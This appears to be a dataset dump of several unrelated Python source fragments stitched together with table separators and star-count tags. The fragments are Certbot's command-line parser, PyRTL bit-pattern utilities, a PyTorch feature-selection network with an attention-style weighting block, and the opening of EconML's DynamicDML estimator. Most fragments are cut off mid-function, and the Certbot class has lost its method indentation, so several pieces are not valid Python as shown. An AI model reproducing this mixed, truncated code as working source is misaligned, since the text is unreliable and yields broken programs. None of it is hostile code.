input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<gh_stars>1-10
"""Certbot command line argument parser"""
import argparse
import copy
import functools
import glob
import sys
from typing import Any
from typing import Dict
from typing import Iterable
from typing import List
from typing import Optional
from typing import Union
import configargparse
from certbot import crypto_util
from certbot import errors
from certbot import util
from certbot._internal import constants
from certbot._internal import hooks
from certbot._internal.cli.cli_constants import ARGPARSE_PARAMS_TO_REMOVE
from certbot._internal.cli.cli_constants import COMMAND_OVERVIEW
from certbot._internal.cli.cli_constants import EXIT_ACTIONS
from certbot._internal.cli.cli_constants import HELP_AND_VERSION_USAGE
from certbot._internal.cli.cli_constants import SHORT_USAGE
from certbot._internal.cli.cli_constants import ZERO_ARG_ACTIONS
from certbot._internal.cli.cli_utils import _Default
from certbot._internal.cli.cli_utils import add_domains
from certbot._internal.cli.cli_utils import CustomHelpFormatter
from certbot._internal.cli.cli_utils import flag_default
from certbot._internal.cli.cli_utils import HelpfulArgumentGroup
from certbot._internal.cli.verb_help import VERB_HELP
from certbot._internal.cli.verb_help import VERB_HELP_MAP
from certbot._internal.display import obj as display_obj
from certbot._internal.plugins import disco
from certbot.compat import os
class HelpfulArgumentParser:
"""Argparse Wrapper.
This class wraps argparse, adding the ability to make --help less
verbose, and request help on specific subcategories at a time, eg
'certbot --help security' for security options.
"""
def __init__(self, args: List[str], plugins: Iterable[str],
             detect_defaults: bool = False) -> None:
    """Build the certbot argument parser.

    :param args: raw command-line arguments; mutated in place (a leading
        'help' is rewritten to '--help' and the verb token is removed by
        determine_verb())
    :param plugins: names of all discovered plugins, used for help topics
        and the usage banner
    :param detect_defaults: when True, parse_args() returns early so the
        caller can detect which options were left at their defaults
    """
    # Imported here to avoid a circular import with certbot._internal.main.
    from certbot._internal import main
    # Dispatch table: CLI verb -> implementing function in main.
    # "auth" and "everything" are aliases for certonly/run.
    self.VERBS = {
        "auth": main.certonly,
        "certonly": main.certonly,
        "run": main.run,
        "install": main.install,
        "plugins": main.plugins_cmd,
        "register": main.register,
        "update_account": main.update_account,
        "unregister": main.unregister,
        "renew": main.renew,
        "revoke": main.revoke,
        "rollback": main.rollback,
        "everything": main.run,
        "update_symlinks": main.update_symlinks,
        "certificates": main.certificates,
        "delete": main.delete,
        "enhance": main.enhance,
    }
    # Get notification function for printing
    self.notify = display_obj.NoninteractiveDisplay(sys.stdout).notification
    # List of topics for which additional help can be provided
    HELP_TOPICS = ["all", "security", "paths", "automation", "testing"]
    HELP_TOPICS += list(self.VERBS) + self.COMMANDS_TOPICS + ["manage"]
    plugin_names = list(plugins)
    self.help_topics = HELP_TOPICS + plugin_names + [None]  # type: ignore
    self.detect_defaults = detect_defaults
    self.args = args
    # "certbot help" behaves exactly like "certbot --help"
    if self.args and self.args[0] == 'help':
        self.args[0] = '--help'
    self.determine_verb()
    # Pre-scan for -h/--help before argparse runs, since a help request may
    # name a topic ("--help security") that argparse would not understand.
    help1 = self.prescan_for_flag("-h", self.help_topics)
    help2 = self.prescan_for_flag("--help", self.help_topics)
    self.help_arg: Union[str, bool]
    if isinstance(help1, bool) and isinstance(help2, bool):
        self.help_arg = help1 or help2
    else:
        # at least one flag named a topic; the -h topic takes precedence
        self.help_arg = help1 if isinstance(help1, str) else help2
    # NOTE: _usage_string() calls sys.exit() for plain --help requests.
    short_usage = self._usage_string(plugins, self.help_arg)
    self.visible_topics = self.determine_help_topics(self.help_arg)
    # elements are added by .add_group()
    self.groups: Dict[str, argparse._ArgumentGroup] = {}
    # elements are added by .parse_args()
    self.defaults: Dict[str, Any] = {}
    self.parser = configargparse.ArgParser(
        prog="certbot",
        usage=short_usage,
        formatter_class=CustomHelpFormatter,
        args_for_setting_config_path=["-c", "--config"],
        default_config_files=flag_default("config_files"),
        config_arg_help_message="path to config file (default: {0})".format(
            " and ".join(flag_default("config_files"))))
    # This is the only way to turn off overly verbose config flag documentation
    self.parser._add_config_file_help = False
    # Set by determine_verb(); annotated here for type checkers.
    self.verb: str
# Help topic aliases that all behave like "--help subcommands"
COMMANDS_TOPICS = ["command", "commands", "subcommand", "subcommands", "verbs"]
def _list_subcommands(self) -> str:
    """Return a formatted listing of every subcommand and its short help text."""
    # Pad each verb name to the width of the longest one so the
    # short descriptions line up in a single column.
    width = max(len(name) for name in VERB_HELP_MAP)
    rows = ['{0:<{length}} {1}'.format(verb, props.get("short", ""), length=width) + "\n"
            for verb, props in sorted(VERB_HELP)]
    return ("The full list of available SUBCOMMANDS is:\n\n"
            + "".join(rows)
            + "\nYou can get more help on a specific subcommand with --help SUBCOMMAND\n")
def _usage_string(self, plugins: Iterable[str], help_arg: Union[str, bool]) -> str:
    """Make usage strings late so that plugins can be initialised late

    :param plugins: all discovered plugins
    :param help_arg: False for none; True for --help; "TOPIC" for --help TOPIC
    :rtype: str
    :returns: a short usage string for the top of --help TOPIC)
    """
    nginx_doc = (
        "--nginx Use the Nginx plugin for authentication & installation"
        if "nginx" in plugins
        else "(the certbot nginx plugin is not installed)")
    apache_doc = (
        "--apache Use the Apache plugin for authentication & installation"
        if "apache" in plugins
        else "(the certbot apache plugin is not installed)")
    usage = SHORT_USAGE
    if help_arg is True:
        # Plain --help: print the overview and stop right here.
        self.notify(usage + COMMAND_OVERVIEW % (apache_doc, nginx_doc) + HELP_AND_VERSION_USAGE)
        sys.exit(0)
    if help_arg in self.COMMANDS_TOPICS:
        # A "commands"-style topic: print the subcommand listing and stop.
        self.notify(usage + self._list_subcommands())
        sys.exit(0)
    if help_arg == "all":
        # if we're doing --help all, the OVERVIEW is part of the SHORT_USAGE at
        # the top; if we're doing --help someothertopic, it's OT so it's not
        usage += COMMAND_OVERVIEW % (apache_doc, nginx_doc)
    elif isinstance(help_arg, str):
        # A verb-specific topic may define its own usage banner.
        usage = VERB_HELP_MAP.get(help_arg, {}).get("usage", None) or usage
    # Only remaining case is help_arg == False, which gives effectively usage == SHORT_USAGE.
    return usage
def remove_config_file_domains_for_renewal(self, parsed_args: argparse.Namespace) -> None:
"""Make "certbot renew" safe if domains are set in cli.ini."""
# Works around https://github.com/certbot/certbot/issues/4096
if self.verb == "renew":
for source, flags in self.parser._source_to_settings.items(): # pylint: disable=protected-access
if source.startswith("config_file") and "domains" in flags:
parsed_args.domains = _Default() if self.detect_defaults else []
def parse_args(self) -> argparse.Namespace:
    """Parses command line arguments and returns the result.

    :returns: parsed command line arguments
    :rtype: argparse.Namespace

    :raises errors.Error: on conflicting or unsupported flag combinations
    """
    parsed_args = self.parser.parse_args(self.args)
    # Attach the function implementing the chosen verb for the caller.
    parsed_args.func = self.VERBS[self.verb]
    parsed_args.verb = self.verb
    self.remove_config_file_domains_for_renewal(parsed_args)
    if self.detect_defaults:
        # Caller only wants to inspect defaults; skip all post-processing.
        return parsed_args
    # Snapshot argparse defaults so later code can tell whether a value
    # was set explicitly or merely left at its default.
    self.defaults = {key: copy.deepcopy(self.parser.get_default(key))
                     for key in vars(parsed_args)}
    # Do any post-parsing homework here
    if self.verb == "renew":
        if parsed_args.force_interactive:
            raise errors.Error(
                "{0} cannot be used with renew".format(
                    constants.FORCE_INTERACTIVE_FLAG))
        # renew is implicitly non-interactive (it may run from cron)
        parsed_args.noninteractive_mode = True
    if parsed_args.force_interactive and parsed_args.noninteractive_mode:
        raise errors.Error(
            "Flag for non-interactive mode and {0} conflict".format(
                constants.FORCE_INTERACTIVE_FLAG))
    if parsed_args.staging or parsed_args.dry_run:
        # Redirect config.server to the staging endpoint (with sanity checks).
        self.set_test_server(parsed_args)
    if parsed_args.csr:
        self.handle_csr(parsed_args)
    if parsed_args.must_staple:
        # OCSP Must-Staple implies the staple enhancement.
        parsed_args.staple = True
    if parsed_args.validate_hooks:
        hooks.validate_hooks(parsed_args)
    if parsed_args.allow_subset_of_names:
        if any(util.is_wildcard_domain(d) for d in parsed_args.domains):
            raise errors.Error("Using --allow-subset-of-names with a"
                               " wildcard domain is not supported.")
    if parsed_args.hsts and parsed_args.auto_hsts:
        raise errors.Error(
            "Parameters --hsts and --auto-hsts cannot be used simultaneously.")
    if isinstance(parsed_args.key_type, list) and len(parsed_args.key_type) > 1:
        raise errors.Error(
            "Only *one* --key-type type may be provided at this time.")
    return parsed_args
def set_test_server(self, parsed_args: argparse.Namespace) -> None:
    """We have --staging/--dry-run; perform sanity check and set config.server"""
    # Flag combinations should produce these results:
    #   | --staging | --dry-run |
    # ------------------------------------------------------------
    # | --server acme-v02 | Use staging | Use staging |
    # | --server acme-staging-v02 | Use staging | Use staging |
    # | --server <other> | Conflict error | Use <other> |
    allowed_defaults = (flag_default("server"), constants.STAGING_URI)
    custom_server = parsed_args.server not in allowed_defaults
    if parsed_args.staging and custom_server:
        raise errors.Error("--server value conflicts with --staging")
    if not custom_server:
        parsed_args.server = constants.STAGING_URI
    if not parsed_args.dry_run:
        return
    if self.verb not in ["certonly", "renew"]:
        raise errors.Error("--dry-run currently only works with the "
                           "'certonly' or 'renew' subcommands (%r)" % self.verb)
    parsed_args.staging = True
    parsed_args.break_my_certs = True
    accounts_pattern = os.path.join(parsed_args.config_dir, constants.ACCOUNTS_DIR, "*")
    if glob.glob(accounts_pattern):
        # The user has a prod account, but might not have a staging
        # one; we don't want to start trying to perform interactive registration
        parsed_args.tos = True
        parsed_args.register_unsafely_without_email = True
def handle_csr(self, parsed_args: argparse.Namespace) -> None:
    """Process a --csr flag."""
    if parsed_args.verb != "certonly":
        raise errors.Error("Currently, a CSR file may only be specified "
                           "when obtaining a new or replacement "
                           "via the certonly command. Please try the "
                           "certonly command instead.")
    if parsed_args.allow_subset_of_names:
        raise errors.Error("--allow-subset-of-names cannot be used with --csr")
    csr_path, csr_contents = parsed_args.csr[0:2]
    cert_type, csr_obj, csr_names = crypto_util.import_csr_file(csr_path, csr_contents)
    # obtain_certificate_from_csr requires parsed_args.domains to be
    # populated, even though webroot itself does not need it.
    for name in csr_names:
        add_domains(parsed_args, name)
    if not csr_names:
        # TODO: add CN to domains instead:
        raise errors.Error(
            "Unfortunately, your CSR %s needs to have a SubjectAltName for every domain"
            % parsed_args.csr[0])
    parsed_args.actual_csr = (csr_obj, cert_type)
    requested = {name.lower() for name in csr_names}
    configured = set(parsed_args.domains)
    if requested != configured:
        raise errors.ConfigurationError(
            "Inconsistent domain requests:\nFrom the CSR: {0}\nFrom command line/config: {1}"
            .format(", ".join(requested), ", ".join(configured)))
def determine_verb(self) -> None:
"""Determines the verb/subcommand provided by the user.
This function works around some of the limitations of argparse.
"""
if "-h" in self.args or "--help" in self.args:
# all verbs double as help arguments; don't get them confused
self.verb = "help"
return
for i, token in enumerate(self.args):
if token in self.VERBS:
verb = token
if verb == "auth":
verb = "certonly"
if verb == "everything":
verb = "run"
self.verb = verb
self.args.pop(i)
return
self.verb = "run"
def prescan_for_flag(self, flag: str, possible_arguments: Iterable[str]) -> Union[str, bool]:
"""Checks cli input for flags.
Check for a flag, which accepts a fixed set of possible arguments, in
the command line; we will use this information to configure argparse's
help correctly. Return the flag's argument, if it has one that matches
the sequence @possible_arguments; otherwise return whether the flag is
present.
"""
if flag not in self.args:
return False
pos = self.args.index(flag)
try:
nxt = self.args[pos + 1]
if nxt in possible_arguments:
return nxt
except IndexError:
pass
return True
def add(self, topics: Optional[Union[List[Optional[str]], str]], *args: Any,
**kwargs: Any) -> None:
"""Add a new command line argument.
:param topics: str or [str] help topic(s) this should be listed | |
be true when w is '0101' or '0111'
m, _ = match_bitpattern(w, '??01') # m be true when last two bits of w are '01'
m, _ = match_bitpattern(w, '??_0 1') # spaces/underscores are ignored, same as line above
m, (a, b) = match_pattern(w, '01aa1?bbb11a') # all bits with same letter make up same field
m, fs = match_pattern(w, '01aa1?bbb11a', {'a': 'foo', 'b': 'bar'}) # fields fs.foo, fs.bar
"""
w = as_wires(w)
if not isinstance(bitpattern, six.string_types):
raise PyrtlError('bitpattern must be a string')
nospace_string = ''.join(bitpattern.replace('_', '').split())
if len(w) != len(nospace_string):
raise PyrtlError('bitpattern string different length than wirevector provided')
lsb_first_string = nospace_string[::-1] # flip so index 0 is lsb
zero_bits = [w[index] for index, x in enumerate(lsb_first_string) if x == '0']
one_bits = [w[index] for index, x in enumerate(lsb_first_string) if x == '1']
match = rtl_all(*one_bits) & ~rtl_any(*zero_bits)
# Since only Python 3.7 and above guarantees maintaining insertion order in dictionaries,
# do all of this to make sure we can maintain the ordering in the returned Tuple.
# Order of fields is determined based on left-to-right ordering in original string.
def field_name(name):
if field_map is not None:
if name not in field_map:
raise PyrtlError('field_map argument has been given, '
'but %s field is not present' % name)
return field_map[name]
return name
fields = collections.defaultdict(list)
for i, c in enumerate(lsb_first_string):
if c not in '01?':
fields[c].append(w[i])
fields = sorted(fields.items(), key=lambda m: nospace_string.index(m[0])) # now list of tuples
Fields = collections.namedtuple('Fields', ' '.join(field_name(name) for name, _ in fields))
fields = Fields(**{field_name(k): concat_list(l) for k, l in fields})
return MatchedFields(match, fields)
def bitpattern_to_val(bitpattern, *ordered_fields, **named_fields):
    """ Return an unsigned integer representation of field format filled with the provided values.

    :param bitpattern: A string holding the pattern (of bits and wildcards) to match
    :param ordered_fields: A list of parameters to be matched to the provided bit pattern in
        the order provided. If ordered_fields are provided then no named_fields can be used.
    :param named_fields: A list of parameters to be matched to the provided bit pattern in
        by the names provided. If named_fields are provided then no ordered_fields can be used.
        A special keyword argument, 'field_map', can be provided, which will allow you specify
        a correspondence between the 1-letter field names in the bitpattern string and longer,
        human readable field names (see example below).
    :return: An unsigned integer carrying the result of the field substitution.

    This function will take a specified pattern of bits, where some
    of the pattern can be "wildcard" bits. The wildcard bits must all be named with a single
    letter and, unlike the related function ``match_bitpattern``, no "?" can be used. The function
    will take the provided bitpattern and create an integer that substitutes the provided fields
    in for the given wildcards at the bit level. This sort of bit substitution is useful when
    creating values for testing when the resulting values will be "chopped" up by the hardware
    later (e.g. instruction decode or other bitfield heavy functions).

    If a special keyword argument, 'field_map', is provided, then the named fields provided
    can be longer, human-readable field names, which will correspond to the field in the
    bitpattern according to the field_map. See the third example below.

    Examples::

        bitpattern_to_val('0000000sssssrrrrr000ddddd0110011', s=2, r=1, d=3)  # RISCV ADD instr
        # evaluates to 0b00000000001000001000000110110011
        bitpattern_to_val('iiiiiiisssssrrrrr010iiiii0100011', i=1, s=4, r=3)  # RISCV SW instr
        # evaluates to 0b00000000010000011010000010100011
        bitpattern_to_val(
            'iiiiiiisssssrrrrr010iiiii0100011',
            imm=1, rs2=4, rs1=3,
            field_map={'i': 'imm', 's': 'rs2', 'r': 'rs1'}
        )  # RISCV SW instr
        # evaluates to 0b00000000010000011010000010100011
    """
    # Mixing positional and named field values would be ambiguous; note this
    # check runs before 'field_map' is popped, so supplying ordered fields
    # together with a field_map is also rejected.
    if len(ordered_fields) > 0 and len(named_fields) > 0:
        raise PyrtlError('named and ordered fields cannot be mixed')

    def letters_in_field_order():
        # Unique field letters, ordered by first (leftmost) appearance.
        seen = []
        for c in bitpattern:
            if c != '0' and c != '1' and c not in seen:
                seen.append(c)
        return seen

    field_map = named_fields.pop('field_map', None)

    bitlist = []
    lifo = letters_in_field_order()
    if ordered_fields:
        if len(lifo) != len(ordered_fields):
            raise PyrtlError('number of fields and number of unique patterns do not match')
        intfields = [int(f) for f in ordered_fields]
    else:
        if len(lifo) != len(named_fields):
            raise PyrtlError('number of fields and number of unique patterns do not match')
        try:
            def fn(n):
                # Translate a 1-letter field name to its long name, if mapped.
                return field_map[n] if field_map else n
            intfields = [int(named_fields[fn(n)]) for n in lifo]
        except KeyError as e:
            raise PyrtlError('bitpattern field %s was not provided in named_field list'
                             % e.args[0]) from e
    fmap = dict(zip(lifo, intfields))
    # Walk the pattern from lsb to msb, consuming one bit of the matching
    # field's value for every wildcard position.
    for c in bitpattern[::-1]:
        if c == '0' or c == '1':
            bitlist.append(c)
        elif c == '?':
            raise PyrtlError('all fields in the bitpattern must have names')
        else:
            bitlist.append(str(fmap[c] & 0x1))  # append lsb of the field
            fmap[c] = fmap[c] >> 1  # and bit shift by one position
    # After all bits are consumed a field must be exhausted: 0 for
    # non-negative values, -1 for sign bits of negative (two's-complement) values.
    for f in fmap:
        if fmap[f] not in [0, -1]:
            raise PyrtlError('too many bits given to value to fit in field %s' % f)
    if len(bitpattern) != len(bitlist):
        raise PyrtlInternalError('resulting values have different bitwidths')
    final_str = ''.join(bitlist[::-1])
    return int(final_str, 2)
def chop(w, *segment_widths):
    """ Returns a list of WireVectors each a slice of the original 'w'

    :param w: The WireVector to be chopped up into segments
    :param segment_widths: Additional arguments are integers which are bitwidths
    :return: A list of WireVectors each with a proper segment width

    This function chops a WireVector into a set of smaller WireVectors of different
    lengths. It is most useful when multiple "fields" are contained with a single
    wirevector, for example when breaking apart an instruction. For example, if
    you wish to break apart a 32-bit MIPS I-type (Immediate) instruction you know
    it has a 6-bit opcode, 2 5-bit operands, and 16-bit offset. You could take
    each of those slices in absolute terms: offset=instr[0:16], rt=instr[16:21]
    and so on, but then you have to do the arithmetic yourself. With this function
    you can do all the fields at once which can be seen in the examples below.

    As a check, chop will throw an error if the sum of the lengths of the fields
    given is not the same as the length of the wirevector to chop. Note also that
    chop assumes that the "rightmost" arguments are the least significant bits
    (just like pyrtl concat) which is normal for hardware functions but makes the
    list order a little counter intuitive.

    Examples: ::

        opcode, rs, rt, offset = chop(instr, 6, 5, 5, 16)  # MIPS I-type instruction
        opcode, instr_index = chop(instr, 6, 26)  # MIPS J-type instruction
        opcode, rs, rt, rd, sa, function = chop(instr, 6, 5, 5, 5, 5, 6)  # MIPS R-type
        msb, middle, lsb = chop(data, 1, 30, 1)  # breaking out the most and least sig bit
    """
    w = as_wires(w)
    for seg_width in segment_widths:
        if not isinstance(seg_width, int):
            raise PyrtlError('segment widths must be integers')
    if sum(segment_widths) != len(w):
        # fixed typo in this user-facing message ("wirevetor")
        raise PyrtlError('sum of segment widths must equal length of wirevector')
    n_segments = len(segment_widths)
    # Segments are listed msb-first, so segment i starts where all the
    # segments to its right (lower significance) end.
    starts = [sum(segment_widths[i + 1:]) for i in range(n_segments)]
    ends = [sum(segment_widths[i:]) for i in range(n_segments)]
    return [w[s:e] for s, e in zip(starts, ends)]
def input_list(names, bitwidth=None):
    """ Allocate and return a list of Inputs.

    :param names: Names for the Inputs. Can be a list or single comma/space-separated string
    :param bitwidth: The desired bitwidth for the resulting Inputs.
    :return: List of Inputs.

    This is a thin convenience wrapper, equivalent to: ::

        wirevector_list(names, bitwidth, wvtype=pyrtl.wire.Input)
    """
    return wirevector_list(names=names, bitwidth=bitwidth, wvtype=Input)
def output_list(names, bitwidth=None):
    """ Allocate and return a list of Outputs.

    :param names: Names for the Outputs. Can be a list or single comma/space-separated string
    :param bitwidth: The desired bitwidth for the resulting Outputs.
    :return: List of Outputs.

    This is a thin convenience wrapper, equivalent to: ::

        wirevector_list(names, bitwidth, wvtype=pyrtl.wire.Output)
    """
    return wirevector_list(names=names, bitwidth=bitwidth, wvtype=Output)
def register_list(names, bitwidth=None):
    """ Allocate and return a list of Registers.

    :param names: Names for the Registers. Can be a list or single comma/space-separated string
    :param bitwidth: The desired bitwidth for the resulting Registers.
    :return: List of Registers.

    This is a thin convenience wrapper, equivalent to: ::

        wirevector_list(names, bitwidth, wvtype=pyrtl.wire.Register)
    """
    return wirevector_list(names=names, bitwidth=bitwidth, wvtype=Register)
def wirevector_list(names, bitwidth=None, wvtype=WireVector):
""" Allocate and return a list of WireVectors.
| |
<gh_stars>0
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from typing import Union
from typing_extensions import Literal
import warnings
from tqdm import tqdm
import os
class Mlp(nn.Module):
    """MLP with a squeeze-and-excite style (SNE) feature-weighting front end.

    The ``sne`` sub-network maps the raw features to one weight per feature
    (Hardsigmoid output, so each weight lies in [0, 1]); the
    ``decisionModel`` sub-network consumes the re-weighted features and
    produces the final prediction.
    """

    def __init__(self, inSize: int, hiddenSize: int, outputSize: int,
                 outputFuntion: nn = nn.Sigmoid, skaling: float = 10.0,
                 layerDepth: int = 4, dropout: float = 0.0):
        """Create a Pytorch model for the wrapper part.

        Args:
            inSize (int): the number of input features
            hiddenSize (int): number of hidden-layer neurons in the decision model
            outputSize (int): output dimension
            outputFuntion (torch.nn): output activation class. Defaults to nn.Sigmoid.
            skaling (float, optional): width multiplier of the SNE block
                (its hidden width is ``int(inSize * skaling)``); recommended
                range is 0.25 to 10. Defaults to 10.0.
            layerDepth (int, optional): number of hidden layers in the
                decision model. Defaults to 4.
            dropout (float, optional): dropout probability; 0.0 disables
                dropout entirely. Defaults to 0.0.
        """
        super().__init__()
        sne_width = int(inSize * skaling)

        def _maybe_dropout():
            # Returns a dropout layer only when requested, keeping the
            # nn.Sequential containers free of no-op modules.
            return [nn.Dropout(dropout)] if dropout != 0.0 else []

        # SNE block: this is where the magic happens — it produces a
        # per-feature weight used to gate the input features.
        self.sne = nn.Sequential(
            nn.Linear(inSize, sne_width),
            nn.ReLU(),
            *_maybe_dropout(),
            nn.Linear(sne_width, sne_width),
            nn.ReLU(),
            *_maybe_dropout(),
            nn.Linear(sne_width, inSize),
            nn.Hardsigmoid(),
        )

        # Decision model: a standard MLP over the re-weighted features.
        layers = [nn.Linear(inSize, hiddenSize), nn.ReLU(), *_maybe_dropout()]
        for _ in range(layerDepth):
            layers += [nn.Linear(hiddenSize, hiddenSize), nn.ReLU(), *_maybe_dropout()]
        layers += [nn.Linear(hiddenSize, outputSize), outputFuntion()]
        self.decisionModel = nn.Sequential(*layers)

    def forward(self, x):
        """Return ``(prediction, feature_weights)`` for input batch ``x``."""
        weights = self.sne(x)
        return self.decisionModel(weights * x), weights
class FeatureSelector():
def __init__(self, numberOfFeatures:int,
toDelPerStep:int = 1,
iterations:int = 1,
hiddenSize: int = 70,
outputFunction: "nnLoss" = nn.Sigmoid,
skalingLayer: float = 10.0,
layerDepth: int = 4,
dropout: float = 0.0,
device: Literal["auto", "cuda", "cpu"] = "auto",
loss:Union["function", Literal["mse", "bce"]] = "mse",
validationMetric:"function" = F.mse_loss,
optimizer:Literal["optimizerClass","sgd", "rmsprop"] = "sgd",
learnRate:float = 0.01,
momentum: float = 0.9,
weightDecay: float = 0.0,
batchSize : int = 100,
maxEpochs : int = 800,
patience: int = 6,
verbose: Literal[0,1,2] = 1,
dataSkaling: Literal["auto", None, "minMax", "meanStd"] = "auto"):
"""Initialize the main class
Args:
numberOfFeatures (int): the number of features it should reduce to per iteration. Meaning at the end it can come out with more features then this number here, depending on the number of iterations
toDelPerStep (int, optional): This is still a backward wrapper method of removing the features. This means How many Features should be removed for each learning of a Neural Network. A Higher Number means the programm will be faster, but maybe not to accurate depending on the data . Defaults to 1.
iterations (int, optional): How often schould the Programm run from the beginning. The more often it runs the more stable the output will be, but it will take longer. Defaults to 1.
hiddenSize (int, optional): the Hidden Size of the Klassifikation Part of the Model. Defaults to 70.
outputFunction (nnLoss, optional): the Output Funktion of the Model, if you don't want to have an Outputfunktion put nn.Identity(). Defaults to nn.Sigmoid.
skalingLayer (float, optional): the Skaling Factor of the Attention part of the model (hiddensize of attention = skaling* insize), probably should be 1.0-10.0. Defaults to 10.0.
layerDepth (int, optional): the number of Hiddenlayers in the Classifiaction part of the model. Defaults to 4.
dropout (float, optional): the dropout of the model, Out of experience this doesn't matter to much for my examples. Defaults to 0.0.
device (Literal["auto", "cuda", "cpu"], optional): the device the model should be trained on, if "auto", it will look if you have a cuda system or not and decide on there own. other Values you can choose from are "cpu", "cuda". Defaults to "auto".
loss (Union["function", Literal["mse", "bce"]], optional): the loss function that it should be trained on. you can just put your own funtin in there, in the form of pytorch Loss funtions like torch.nn.F.mse_loss. Defaults to "mse".
validationMetric (function, optional): Its recomended to use Something like BER, buts thats for the Specific Tasks, But it won't work if you use a Metric like Accuracy, because the code needs a Metric where the lower the metric the better. Defaults to F.mse_loss.
optimizer (Literal["optimizerClass","sgd", "rmsprop"], optional): which optimizer to use for this, please use an optimizer that has momentum and weight decay from torch.optim, else that will raise an error probablys. Defaults to "sgd".
learnRate (float, optional): the learnrate for the optimizer. Defaults to 0.01.
momentum (float, optional): the momentum for the optimizer(if you want to use RMSProp use a lower momentum). Defaults to 0.9.
weightDecay (float, optional): the weight decay for the optimizer. Defaults to 0.0.
batchSize (int, optional): the batch size to train and evalute the mode. Defaults to 100.
maxEpochs (int, optional): the maximal epochs to train the model. Defaults to 800.
patience (int, optional): This is for early Stopping the training, if the number is 6 for example, then it will test if the smoothed validation metric curve raises the value for 6 successively values. Defaults to 6.
verbose (Literal[0,1,2], optional): the amount of information that is printed out, the higher the number the more information is printed out but choose between 0,1,2. Defaults to 1.
dataSkaling (Literal["auto", None, "minMax", "meanStd"], optional): the skaling of the input data, "auto" just meaning there will be a min max Skale, if you want to use a custom skaling then skale the data beforehand and put None as a skaling. Defaults to "auto".
"""
self.numberOfFeatures = numberOfFeatures
self.toDelPerStep = toDelPerStep
self.iterations = iterations
self.hiddenSize = hiddenSize
self.outputFunction = outputFunction
self.skalingLayer = skalingLayer
self.layerDepth = layerDepth
self.dropout = dropout
if(device == "auto"):
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
else:
self.device = device
if(type(loss) == str):
if(loss == "mse"):
self.loss = F.mse_loss
elif(loss == "bce"):
self.loss = F.binary_cross_entropy
else:
warnings.warn(f"Couldn't interpret {loss}, going to go with the default mse")
self.loss = F.mse_loss
else:
self.loss = loss
self.validationMetric = validationMetric
if(type(optimizer) == str):
if(optimizer == "sgd"):
self.optimizer = torch.optim.SGD
elif(optimizer == "rmsprop"):
self.optimizer = torch.optim.RMSprop
else:
warnings.warn(f"Couldn't interpret {optimizer}, going to go with the default sgd")
self.optimizer = torch.optim.SGD
else:
self.optimizer = optimizer
self.learnRate = learnRate
self.momentum = momentum
self.weightDecay = weightDecay
self.batchSize = batchSize
self.maxEpochs = maxEpochs
self.patience = patience
self.verbose = verbose
self.dataSkaling = dataSkaling
if(self.dataSkaling not in ["auto", None, "minMax", "meanStd"]):
warnings.warn(f"Couldn't interpret {self.dataSkaling}, going to go with no normailzation")
#this is for the early Stopping method, this will smoothe out the curve, so we can see if the model is overfitting or not
#more information @ https://en.wikipedia.org/wiki/Savitzky–Golay_filter
self.savitzkyGolayFilter:np.ndarray = np.array([15, -55, 30, 135, 179, 135, 30, -55, 15])/429
self.bestDict = {}
def fit(self,X:np.ndarray,Y:np.ndarray,validationData:Union[Literal["auto"], tuple] = "auto")->dict:
"""The Funktion Called to do the reduction of data
Args:
X (np.ndarray): the input data
Y (np.ndarray): the target data
validationData (Union[Literal["auto"], tuple] optional): if auto it will do a random 20% split of the input data, but you can also fill in ur custom data as a tuple meaning (valX,ValY). Defaults to "auto".
Returns:
dict: the best indicies and how often they came up per iteration (the more often a feature is recognised as a better feature the better it probobly is)
"""
#good practice
self.randomSeed = np.random.randint(0,1000)
np.random.seed(self.randomSeed)
if(self.verbose > 1):
print(f"random seed for this run is {self.randomSeed}")
#If auto Split these two with a 20% split ratio, else use the data provided
if(validationData == "auto"):
testTrainSplit = np.random.choice([True, False], X.shape[0], p = [0.8,0.2])
self.trainIn = X[testTrainSplit == True]
self.trainOut = Y [testTrainSplit == True]
self.valIn = X[testTrainSplit == False]
self.valOut = Y[testTrainSplit == False]
if(self.verbose > 1):
print(f"The test train split produced these shapes train: {self.trainIn.shape}, validate: {self.valIn.shape}")
else:
self.trainIn = X
self.trainOut = Y
self.valIn, self.valOut = validationData
if(self.verbose > 1):
print(f"normalizing data")
#normalize the data so that the Network can work with it(Neural Networks don't work good with non Normalized Data)
self.normalize_data()
bestData = {}
if(self.verbose> 0 ):
#remove the Data the iterations are just to remove randomness form the data
for iterNumber in range(self.iterations):
print(f"Iteration: {iterNumber}")
self.chooseList = [i for i in range(self.trainIn.shape[1])]
for _ in tqdm(range(0, self.trainIn.shape[1] - self.numberOfFeatures, self.toDelPerStep)):
rankingDict | |
d_xt] = sigma_tj
if j >= t:
# Calculating the (t, j) block entry (of size n_treatments x n_treatments) of matrix J
m_tj = np.mean(
XT_res[j][t].reshape(-1, d_xt, 1) @ resT_t.reshape(-1, 1, d_xt),
axis=0)
J[t * d_xt:(t + 1) * d_xt,
j * d_xt:(j + 1) * d_xt] = m_tj
return np.linalg.inv(J) @ Sigma @ np.linalg.inv(J).T
class _DynamicFinalWrapper(_FinalWrapper):
    """Final-stage wrapper that predicts effects from treatment residuals."""

    def predict_with_res(self, X, T_res):
        """Predict outcomes for features ``X`` and treatment residuals ``T_res``.

        Any fitted intercept is subtracted out so that only the
        treatment-dependent part of the prediction remains.
        """
        features = self._combine(X, T_res, fitting=False)
        raw_pred = self._model.predict(features)
        if self._intercept is not None:
            raw_pred = raw_pred - self._intercept
        return reshape(raw_pred, (raw_pred.shape[0],) + self._d_y)
class DynamicDML(LinearModelFinalCateEstimatorMixin, _OrthoLearner):
"""CATE estimator for dynamic treatment effect estimation.
This estimator is an extension of the Double ML approach for treatments assigned sequentially
over time periods.
The estimator is a special case of an :class:`_OrthoLearner` estimator, so it follows the two
stage process, where a set of nuisance functions are estimated in the first stage in a crossfitting
manner and a final stage estimates the CATE model. See the documentation of
:class:`._OrthoLearner` for a description of this two stage process.
Parameters
----------
model_y: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the response to the features. Must implement
`fit` and `predict` methods.
If 'auto' :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
model_t: estimator or 'auto', optional (default is 'auto')
The estimator for fitting the treatment to the features.
If estimator, it must implement `fit` and `predict` methods;
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be applied for discrete treatment,
and :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV`
will be applied for continuous treatment.
